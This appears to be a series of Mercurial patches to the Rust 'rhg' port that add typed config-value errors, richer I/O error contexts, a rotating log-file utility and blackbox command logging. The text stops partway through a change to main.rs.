Differential Revision: https://phab.mercurial-scm.org/D10009 diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -11,5 +11,5 @@ mod config; mod layer; -pub use config::Config; +pub use config::{Config, ConfigValueParseError}; pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -9,7 +9,7 @@ use super::layer; use crate::config::layer::{ - ConfigError, ConfigLayer, ConfigParseError, ConfigValue, + ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, }; use crate::utils::files::get_bytes_from_os_str; use format_bytes::{write_bytes, DisplayBytes}; @@ -54,6 +54,16 @@ Parsed(layer::ConfigLayer), } +#[derive(Debug)] +pub struct ConfigValueParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub section: Vec<u8>, + pub item: Vec<u8>, + pub value: Vec<u8>, + pub expected_type: &'static str, +} + pub fn parse_bool(v: &[u8]) -> Option<bool> { match v.to_ascii_lowercase().as_slice() { b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), @@ -262,15 +272,19 @@ &'config self, section: &[u8], item: &[u8], + expected_type: &'static str, parse: impl Fn(&'config [u8]) -> Option<T>, - ) -> Result<Option<T>, ConfigParseError> { + ) -> Result<Option<T>, ConfigValueParseError> { match self.get_inner(§ion, &item) { Some((layer, v)) => match parse(&v.bytes) { Some(b) => Ok(Some(b)), - None => Err(ConfigParseError { + None => Err(ConfigValueParseError { origin: layer.origin.to_owned(), line: v.line, - bytes: v.bytes.to_owned(), + value: v.bytes.to_owned(), + section: section.to_owned(), + item: item.to_owned(), + expected_type, }), }, None => Ok(None), @@ -283,8 +297,10 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<&str>, ConfigParseError> { - self.get_parse(section, item, |value| str::from_utf8(value).ok()) + ) 
-> Result<Option<&str>, ConfigValueParseError> { + self.get_parse(section, item, "ASCII or UTF-8 string", |value| { + str::from_utf8(value).ok() + }) } /// Returns an `Err` if the first value found is not a valid unsigned @@ -293,8 +309,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<u32>, ConfigParseError> { - self.get_parse(section, item, |value| { + ) -> Result<Option<u32>, ConfigValueParseError> { + self.get_parse(section, item, "valid integer", |value| { str::from_utf8(value).ok()?.parse().ok() }) } @@ -306,8 +322,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<u64>, ConfigParseError> { - self.get_parse(section, item, parse_byte_size) + ) -> Result<Option<u64>, ConfigValueParseError> { + self.get_parse(section, item, "byte quantity", parse_byte_size) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -317,8 +333,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigParseError> { - self.get_parse(section, item, parse_bool) + ) -> Result<Option<bool>, ConfigValueParseError> { + self.get_parse(section, item, "boolean", parse_bool) } /// Returns the corresponding boolean in the config. Returns `Ok(false)` @@ -327,7 +343,7 @@ &self, section: &[u8], item: &[u8], - ) -> Result<bool, ConfigError> { + ) -> Result<bool, ConfigValueParseError> { Ok(self.get_option(section, item)?.unwrap_or(false)) } diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -1,7 +1,8 @@ +use crate::config::ConfigValueParseError; use std::fmt; /// Common error cases that can happen in many different APIs -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum HgError { IoError { error: std::io::Error, @@ -29,6 +30,14 @@ /// The given string is a short explanation for users, not intended to be /// machine-readable. Abort(String), + + /// A configuration value is not in the expected syntax. 
+ /// + /// These errors can happen in many places in the code because values are + parsed lazily as the file-level parser does not know the expected type + and syntax of each value. + #[from] + ConfigValueParseError(ConfigValueParseError), } /// Details about where an I/O error happened @@ -63,6 +72,7 @@ impl fmt::Display for HgError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { + HgError::Abort(explanation) => write!(f, "{}", explanation), HgError::IoError { error, context } => { write!(f, "{}: {}", error, context) } @@ -72,7 +82,25 @@ HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) } - HgError::Abort(explanation) => explanation.fmt(f), + HgError::ConfigValueParseError(ConfigValueParseError { + origin: _, + line: _, + section, + item, + value, + expected_type, + }) => { + // TODO: add origin and line number information, here and in + // corresponding python code + write!( + f, + "config error: {}.{} is not a {} ('{}')", + String::from_utf8_lossy(section), + String::from_utf8_lossy(item), + expected_type, + String::from_utf8_lossy(value) + ) + } } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613055071 -3600 # Thu Feb 11 15:51:11 2021 +0100 # Node ID 1f55cd5b292f5223977ccbff02ff6647f9063f2a # Parent bc08c2331f996e5da6cb0adf5e18c08246511db2 rust: Add a log file rotation utility This is ported to Rust from `mercurial/loggingutil.py`. The "builder" pattern is used to make it visible at call sites what the two numeric parameters mean. In Python they might simply be keyword arguments. 
Differential Revision: https://phab.mercurial-scm.org/D10010 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -137,11 +137,11 @@ fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> { if let Some(entries) = std::fs::read_dir(path) - .for_file(path) + .when_reading_file(path) .io_not_found_as_none()? { for entry in entries { - let file_path = entry.for_file(path)?.path(); + let file_path = entry.when_reading_file(path)?.path(); if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { self.add_trusted_file(&file_path)? } @@ -151,8 +151,9 @@ } fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> { - if let Some(data) = - std::fs::read(path).for_file(path).io_not_found_as_none()? + if let Some(data) = std::fs::read(path) + .when_reading_file(path) + .io_not_found_as_none()? { self.layers.extend(ConfigLayer::parse(path, &data)?) } diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -150,7 +150,8 @@ // `Path::join` with an absolute argument correctly ignores the // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); - let data = std::fs::read(&filename).for_file(&filename)?; + let data = + std::fs::read(&filename).when_reading_file(&filename)?; layers.push(current_layer); layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -41,11 +41,15 @@ } /// Details about where an I/O error happened -#[derive(Debug, derive_more::From)] +#[derive(Debug)] pub enum IoErrorContext { - /// A filesystem operation for the given file - #[from] - File(std::path::PathBuf), + ReadingFile(std::path::PathBuf), + 
WritingFile(std::path::PathBuf), + RemovingFile(std::path::PathBuf), + RenamingFile { + from: std::path::PathBuf, + to: std::path::PathBuf, + }, /// `std::env::current_dir` CurrentDir, /// `std::env::current_exe` @@ -109,28 +113,55 @@ impl fmt::Display for IoErrorContext { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { - IoErrorContext::File(path) => path.display().fmt(f), - IoErrorContext::CurrentDir => f.write_str("current directory"), - IoErrorContext::CurrentExe => f.write_str("current executable"), + IoErrorContext::ReadingFile(path) => { + write!(f, "when reading {}", path.display()) + } + IoErrorContext::WritingFile(path) => { + write!(f, "when writing {}", path.display()) + } + IoErrorContext::RemovingFile(path) => { + write!(f, "when removing {}", path.display()) + } + IoErrorContext::RenamingFile { from, to } => write!( + f, + "when renaming {} to {}", + from.display(), + to.display() + ), + IoErrorContext::CurrentDir => write!(f, "current directory"), + IoErrorContext::CurrentExe => write!(f, "current executable"), } } } pub trait IoResultExt<T> { - /// Annotate a possible I/O error as related to a file at the given path. + /// Annotate a possible I/O error as related to a reading a file at the + /// given path. /// - /// This allows printing something like “File not found: example.txt” - /// instead of just “File not found”. + /// This allows printing something like “File not found when reading + /// example.txt” instead of just “File not found”. /// /// Converts a `Result` with `std::io::Error` into one with `HgError`. 
- fn for_file(self, path: &std::path::Path) -> Result<T, HgError>; + fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError>; + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError>; } impl<T> IoResultExt<T> for std::io::Result<T> { - fn for_file(self, path: &std::path::Path) -> Result<T, HgError> { + fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError> { + self.with_context(|| IoErrorContext::ReadingFile(path.to_owned())) + } + + fn with_context( + self, + context: impl FnOnce() -> IoErrorContext, + ) -> Result<T, HgError> { self.map_err(|error| HgError::IoError { error, - context: IoErrorContext::File(path.to_owned()), + context: context(), }) } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -29,6 +29,7 @@ pub mod revlog; pub use revlog::*; pub mod config; +pub mod logging; pub mod operations; pub mod revset; pub mod utils; diff --git a/rust/hg-core/src/logging.rs b/rust/hg-core/src/logging.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/logging.rs @@ -0,0 +1,101 @@ +use crate::errors::{HgError, HgResultExt, IoErrorContext, IoResultExt}; +use crate::repo::Vfs; +use std::io::Write; + +/// An utility to append to a log file with the given name, and optionally +/// rotate it after it reaches a certain maximum size. +/// +/// Rotation works by renaming "example.log" to "example.log.1", after renaming +/// "example.log.1" to "example.log.2" etc up to the given maximum number of +/// files. +pub struct LogFile<'a> { + vfs: Vfs<'a>, + name: &'a str, + max_size: Option<u64>, + max_files: u32, +} + +impl<'a> LogFile<'a> { + pub fn new(vfs: Vfs<'a>, name: &'a str) -> Self { + Self { + vfs, + name, + max_size: None, + max_files: 0, + } + } + + /// Rotate before writing to a log file that was already larger than the + /// given size, in bytes. `None` disables rotation. 
+ pub fn max_size(mut self, value: Option<u64>) -> Self { + self.max_size = value; + self + } + + /// Keep this many rotated files `{name}.1` up to `{name}.{max}`, in + /// addition to the original `{name}` file. + pub fn max_files(mut self, value: u32) -> Self { + self.max_files = value; + self + } + + /// Append the given `bytes` as-is to the log file, after rotating if + /// needed. + /// + /// No trailing newline is added. Make sure to include one in `bytes` if + /// desired. + pub fn write(&self, bytes: &[u8]) -> Result<(), HgError> { + let path = self.vfs.join(self.name); + let context = || IoErrorContext::WritingFile(path.clone()); + let open = || { + std::fs::OpenOptions::new() + .create(true) + .append(true) + .open(&path) + .with_context(context) + }; + let mut file = open()?; + if let Some(max_size) = self.max_size { + if file.metadata().with_context(context)?.len() >= max_size { + // For example with `max_files == 5`, the first iteration of + // this loop has `i == 4` and renames `{name}.4` to `{name}.5`. + // The last iteration renames `{name}.1` to + // `{name}.2` + for i in (1..self.max_files).rev() { + self.vfs + .rename( + format!("{}.{}", self.name, i), + format!("{}.{}", self.name, i + 1), + ) + .io_not_found_as_none()?; + } + // Then rename `{name}` to `{name}.1`. This is the + // previously-opened `file`. + self.vfs + .rename(self.name, format!("{}.1", self.name)) + .io_not_found_as_none()?; + // Finally, create a new `{name}` file and replace our `file` + // handle. 
+ file = open()?; + } + } + file.write_all(bytes).with_context(context)?; + file.sync_all().with_context(context) + } +} + +#[test] +fn test_rotation() { + let temp = tempfile::tempdir().unwrap(); + let vfs = Vfs { base: temp.path() }; + let logger = LogFile::new(vfs, "log").max_size(Some(3)).max_files(2); + logger.write(b"one\n").unwrap(); + logger.write(b"two\n").unwrap(); + logger.write(b"3\n").unwrap(); + logger.write(b"four\n").unwrap(); + logger.write(b"five\n").unwrap(); + assert_eq!(vfs.read("log").unwrap(), b"five\n"); + assert_eq!(vfs.read("log.1").unwrap(), b"3\nfour\n"); + assert_eq!(vfs.read("log.2").unwrap(), b"two\n"); + assert!(vfs.read("log.3").io_not_found_as_none().unwrap().is_none()); +} diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,5 +1,5 @@ use crate::config::{Config, ConfigError, ConfigParseError}; -use crate::errors::{HgError, IoResultExt}; +use crate::errors::{HgError, IoErrorContext, IoResultExt}; use crate::requirements; use crate::utils::current_dir; use crate::utils::files::get_path_from_bytes; @@ -38,8 +38,8 @@ /// Filesystem access abstraction for the contents of a given "base" diretory #[derive(Clone, Copy)] -pub(crate) struct Vfs<'a> { - base: &'a Path, +pub struct Vfs<'a> { + pub(crate) base: &'a Path, } impl Repo { @@ -196,12 +196,12 @@ /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). - pub(crate) fn hg_vfs(&self) -> Vfs<'_> { + pub fn hg_vfs(&self) -> Vfs<'_> { Vfs { base: &self.dot_hg } } /// For accessing repository store files (in `.hg/store`) - pub(crate) fn store_vfs(&self) -> Vfs<'_> { + pub fn store_vfs(&self) -> Vfs<'_> { Vfs { base: &self.store } } @@ -209,7 +209,7 @@ // The undescore prefix silences the "never used" warning. Remove before // using. 
- pub(crate) fn _working_directory_vfs(&self) -> Vfs<'_> { + pub fn _working_directory_vfs(&self) -> Vfs<'_> { Vfs { base: &self.working_directory, } @@ -217,26 +217,38 @@ } impl Vfs<'_> { - pub(crate) fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { + pub fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { self.base.join(relative_path) } - pub(crate) fn read( + pub fn read( &self, relative_path: impl AsRef<Path>, ) -> Result<Vec<u8>, HgError> { let path = self.join(relative_path); - std::fs::read(&path).for_file(&path) + std::fs::read(&path).when_reading_file(&path) } - pub(crate) fn mmap_open( + pub fn mmap_open( &self, relative_path: impl AsRef<Path>, ) -> Result<Mmap, HgError> { let path = self.base.join(relative_path); - let file = std::fs::File::open(&path).for_file(&path)?; + let file = std::fs::File::open(&path).when_reading_file(&path)?; // TODO: what are the safety requirements here? - let mmap = unsafe { MmapOptions::new().map(&file) }.for_file(&path)?; + let mmap = unsafe { MmapOptions::new().map(&file) } + .when_reading_file(&path)?; Ok(mmap) } + + pub fn rename( + &self, + relative_from: impl AsRef<Path>, + relative_to: impl AsRef<Path>, + ) -> Result<(), HgError> { + let from = self.join(relative_from); + let to = self.join(relative_to); + std::fs::rename(&from, &to) + .with_context(|| IoErrorContext::RenamingFile { from, to }) + } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613563225 -3600 # Wed Feb 17 13:00:25 2021 +0100 # Node ID 36f3a64846c8cb997888132eceab38f78cc9cdc0 # Parent 1f55cd5b292f5223977ccbff02ff6647f9063f2a blackbox: Remove misleading quotes in config example This example previously looked like quotes were part of configuration file syntax, and the parsed `date-format` value was the part inside of them. This is not the case: config syntax only parses quotes in list values. 
Instead, using that config would result in literal quotes being written to `.hg/blackbox.log` as part of the date format. This changes the example to what was probably intended. Differential Revision: https://phab.mercurial-scm.org/D10011 diff --git a/hgext/blackbox.py b/hgext/blackbox.py --- a/hgext/blackbox.py +++ b/hgext/blackbox.py @@ -38,7 +38,7 @@ [blackbox] # Include nanoseconds in log entries with %f (see Python function # datetime.datetime.strftime) - date-format = '%Y-%m-%d @ %H:%M:%S.%f' + date-format = %Y-%m-%d @ %H:%M:%S.%f """ # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613477317 -3600 # Tue Feb 16 13:08:37 2021 +0100 # Node ID 755c31a1caf9ec7786fee84fa7c05205f5c4587f # Parent 36f3a64846c8cb997888132eceab38f78cc9cdc0 rhg: Add support for the blackbox extension Only `command` and `commandfinish` events are logged. The `dirty`, `logsource`, `track` and `ignore` configuration items are not supported yet. To indicate commands executed without Python, a `(rust) ` prefix is added in corresponding log messages. 
Differential Revision: https://phab.mercurial-scm.org/D10012 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -91,6 +91,18 @@ source = "registry+https://github.com/rust-lang/crates.io-index" [[package]] +name = "chrono" +version = "0.4.19" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", + "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "clap" version = "2.33.3" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -467,6 +479,15 @@ ] [[package]] +name = "num-integer" +version = "0.1.44" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "num-traits" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -715,6 +736,7 @@ name = "rhg" version = "0.1.0" dependencies = [ + "chrono 0.4.19 (registry+https://github.com/rust-lang/crates.io-index)", "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", @@ -722,6 +744,7 @@ "hg-core 0.1.0", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", ] [[package]] @@ -856,6 +879,15 @@ source = 
"registry+https://github.com/rust-lang/crates.io-index" [[package]] +name = "users" +version = "0.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "vcpkg" version = "0.2.11" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -949,6 +981,7 @@ "checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" "checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" "checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" +"checksum chrono 0.4.19 (registry+https://github.com/rust-lang/crates.io-index)" = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" "checksum clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" "checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" "checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" @@ -988,6 +1021,7 @@ "checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" "checksum micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" "checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = 
"0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" +"checksum num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" "checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" "checksum num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" "checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" @@ -1035,6 +1069,7 @@ "checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" "checksum unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" "checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" +"checksum users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" "checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" "checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" "checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -26,6 +26,14 @@ Vec<(&'a HgPath, &'a HgPath)>, ); 
+pub fn parse_dirstate_parents( + contents: &[u8], +) -> Result<&DirstateParents, HgError> { + let (parents, _rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + Ok(parents) +} + #[timed] pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, HgError> { let mut copies = Vec::new(); diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -214,6 +214,15 @@ base: &self.working_directory, } } + + pub fn dirstate_parents( + &self, + ) -> Result<crate::dirstate::DirstateParents, HgError> { + let dirstate = self.hg_vfs().mmap_open("dirstate")?; + let parents = + crate::dirstate::parsers::parse_dirstate_parents(&dirstate)?; + Ok(parents.clone()) + } } impl Vfs<'_> { diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -188,6 +188,35 @@ } } +#[cfg(unix)] +pub fn shell_quote(value: &[u8]) -> Vec<u8> { + // TODO: Use the `matches!` macro when we require Rust 1.42+ + if value.iter().all(|&byte| match byte { + b'a'..=b'z' + | b'A'..=b'Z' + | b'0'..=b'9' + | b'.' 
+ | b'_' + | b'/' + | b'+' + | b'-' => true, + _ => false, + }) { + value.to_owned() + } else { + let mut quoted = Vec::with_capacity(value.len() + 2); + quoted.push(b'\''); + for &byte in value { + if byte == b'\'' { + quoted.push(b'\\'); + } + quoted.push(byte); + } + quoted.push(b'\''); + quoted + } +} + pub fn current_dir() -> Result<std::path::PathBuf, HgError> { std::env::current_dir().map_err(|error| HgError::IoError { error, diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -9,9 +9,11 @@ [dependencies] hg-core = { path = "../hg-core"} +chrono = "0.4.19" clap = "2.33.1" derive_more = "0.99" log = "0.4.11" micro-timer = "0.3.1" env_logger = "0.7.1" format-bytes = "0.2.0" +users = "0.11.0" diff --git a/rust/rhg/src/blackbox.rs b/rust/rhg/src/blackbox.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/blackbox.rs @@ -0,0 +1,161 @@ +//! Logging for repository events, including commands run in the repository. + +use crate::CliInvocation; +use format_bytes::format_bytes; +use hg::errors::HgError; +use hg::repo::Repo; +use hg::utils::{files::get_bytes_from_os_str, shell_quote}; + +const ONE_MEBIBYTE: u64 = 1 << 20; + +// TODO: somehow keep defaults in sync with `configitem` in `hgext/blackbox.py` +const DEFAULT_MAX_SIZE: u64 = ONE_MEBIBYTE; +const DEFAULT_MAX_FILES: u32 = 7; + +// Python does not support %.3f, only %f +const DEFAULT_DATE_FORMAT: &str = "%Y/%m/%d %H:%M:%S%.3f"; + +type DateTime = chrono::DateTime<chrono::Local>; + +pub struct ProcessStartTime { + /// For measuring duration + monotonic_clock: std::time::Instant, + /// For formatting with year, month, day, etc. 
+ calendar_based: DateTime, +} + +impl ProcessStartTime { + pub fn now() -> Self { + Self { + monotonic_clock: std::time::Instant::now(), + calendar_based: chrono::Local::now(), + } + } +} + +pub struct Blackbox<'a> { + process_start_time: &'a ProcessStartTime, + /// Do nothing if this is `None` + configured: Option<ConfiguredBlackbox<'a>>, +} + +struct ConfiguredBlackbox<'a> { + repo: &'a Repo, + max_size: u64, + max_files: u32, + date_format: &'a str, +} + +impl<'a> Blackbox<'a> { + pub fn new( + invocation: &'a CliInvocation<'a>, + process_start_time: &'a ProcessStartTime, + ) -> Result<Self, HgError> { + let configured = if let Ok(repo) = invocation.repo { + let config = invocation.config(); + if config.get(b"extensions", b"blackbox").is_none() { + // The extension is not enabled + None + } else { + Some(ConfiguredBlackbox { + repo, + max_size: config + .get_byte_size(b"blackbox", b"maxsize")? + .unwrap_or(DEFAULT_MAX_SIZE), + max_files: config + .get_u32(b"blackbox", b"maxfiles")? + .unwrap_or(DEFAULT_MAX_FILES), + date_format: config + .get_str(b"blackbox", b"date-format")? + .unwrap_or(DEFAULT_DATE_FORMAT), + }) + } + } else { + // Without a local repository there’s no `.hg/blackbox.log` to + // write to. 
+ None + }; + Ok(Self { + process_start_time, + configured, + }) + } + + pub fn log_command_start(&self) { + if let Some(configured) = &self.configured { + let message = format_bytes!(b"(rust) {}", format_cli_args()); + configured.log(&self.process_start_time.calendar_based, &message); + } + } + + pub fn log_command_end(&self, exit_code: i32) { + if let Some(configured) = &self.configured { + let now = chrono::Local::now(); + let duration = self + .process_start_time + .monotonic_clock + .elapsed() + .as_secs_f64(); + let message = format_bytes!( + b"(rust) {} exited {} after {} seconds", + format_cli_args(), + exit_code, + format_bytes::Utf8(format_args!("{:.03}", duration)) + ); + configured.log(&now, &message); + } + } +} + +impl ConfiguredBlackbox<'_> { + fn log(&self, date_time: &DateTime, message: &[u8]) { + let date = format_bytes::Utf8(date_time.format(self.date_format)); + let user = users::get_current_username().map(get_bytes_from_os_str); + let user = user.as_deref().unwrap_or(b"???"); + let rev = format_bytes::Utf8(match self.repo.dirstate_parents() { + Ok(parents) if parents.p2 == hg::revlog::node::NULL_NODE => { + format!("{:x}", parents.p1) + } + Ok(parents) => format!("{:x}+{:x}", parents.p1, parents.p2), + Err(_dirstate_corruption_error) => { + // TODO: log a non-fatal warning to stderr + "???".to_owned() + } + }); + let pid = std::process::id(); + let line = format_bytes!( + b"{} {} @{} ({})> {}\n", + date, + user, + rev, + pid, + message + ); + let result = + hg::logging::LogFile::new(self.repo.hg_vfs(), "blackbox.log") + .max_size(Some(self.max_size)) + .max_files(self.max_files) + .write(&line); + match result { + Ok(()) => {} + Err(_io_error) => { + // TODO: log a non-fatal warning to stderr + } + } + } +} + +fn format_cli_args() -> Vec<u8> { + let mut args = std::env::args_os(); + let _ = args.next(); // Skip the first (or zeroth) arg, the name of the `rhg` executable + let mut args = args.map(|arg| shell_quote(&get_bytes_from_os_str(arg))); 
+ let mut formatted = Vec::new(); + if let Some(arg) = args.next() { + formatted.extend(arg) + } + for arg in args { + formatted.push(b' '); + formatted.extend(arg) + } + formatted +} diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -9,6 +9,7 @@ use hg::repo::{Repo, RepoError}; use std::path::{Path, PathBuf}; +mod blackbox; mod error; mod exitcode; mod ui; @@ -36,7 +37,10 @@ ) } -fn main_with_result(ui: &ui::Ui) -> Result<(), CommandError> { +fn main_with_result( + ui: &ui::Ui, + process_start_time: &blackbox::ProcessStartTime, +) -> Result<(), CommandError> { env_logger::init(); let app = App::new("rhg") .setting(AppSettings::AllowInvalidUtf8) @@ -83,35 +87,47 @@ Err(error) => return Err(error.into()), }; - run(&CliInvocation { + let invocation = CliInvocation { ui, subcommand_args, non_repo_config, repo: repo.as_ref(), - }) + }; + let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; + blackbox.log_command_start(); + let result = run(&invocation); + blackbox.log_command_end(exit_code(&result)); + result } fn main() { + // Run this first, before we find out if the blackbox extension is even + // enabled, in order to include everything in-between in the duration + // measurements. Reading config files can be slow if they’re on NFS. + let process_start_time = blackbox::ProcessStartTime::now(); + let ui = ui::Ui::new(); - let exit_code = match main_with_result(&ui) { + let result = main_with_result(&ui, &process_start_time); + if let Err(CommandError::Abort { message }) = &result { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. + let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + } + std::process::exit(exit_code(&result)) +} + +fn exit_code(result: &Result<(), CommandError>) -> i32 { + match result { Ok(()) => 